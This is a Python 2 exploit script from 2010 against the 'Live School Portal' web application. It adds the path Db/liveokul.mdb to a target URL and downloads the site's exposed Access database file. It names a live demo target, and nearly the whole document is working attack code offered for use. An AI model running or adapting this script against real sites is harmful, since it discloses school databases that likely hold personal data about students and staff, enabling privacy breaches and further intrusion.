#!/usr/bin/env python #-*- coding:cp1254 -*-
# Live School Portal Database Disclosure Exploit (.py) # Demo: http://afcio.com/Db/liveokul.mdb # Found & Exploit Coded By ZoRLu # msn-mail: admin@yildirimordulari.com # Home: z0rlu.blogspot.com # Date: 07/09/2010 # My python Vers: 2.7 download: http://www.python.org/download/ # Tested on my xp professional, proof: http://img835.imageshack.us/img835/7465/livet.jpg # Tesekkur : inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N and all Friends # Temenni : Hayirli Bayramlar
import sys, urllib2, re, os, time
def indiriyoruz(url): import urllib aldosyayi = urllib.urlopen(url) indiraq = open(url.split('/')[-1], 'wb') indiraq.write(aldosyayi.read()) aldosyayi.close() indiraq.close()
if len(sys.argv) < 2: import os os.system('cls') os.system('clear') os.system('color 2') print "_______________________________________________________________" print " " print " Live School Portal Database Disclosure Exploit (.py) " print " " print " coded by ZoRLu " print " " print ' usage: %s http://server.com/path/' % os.path.basename(sys.argv[0]) print " " print "_______________________________________________________________" sys.exit(1)
add = "http://" add2 = "/" sitemiz = sys.argv[1]
if sitemiz[-1:] != add2: print "\nwhere is it: " + add2 print "okk I will add" time.sleep(2) sitemiz += add2 print "its ok" + " " + sitemiz if sitemiz[:7] != add: print "\nwhere is it: " + add print "okk I will add" time.sleep(2) sitemiz = add + sitemiz print "its ok" + " " + sitemiz
vulnfile = "Db/liveokul.mdb" url2 = sitemiz + vulnfile
if __name__ == '__main__': import sys if len(sys.argv) == 2: print "\nFile is Downloading\n" try: indiriyoruz(url2) except IOError: print 'Filename not found.'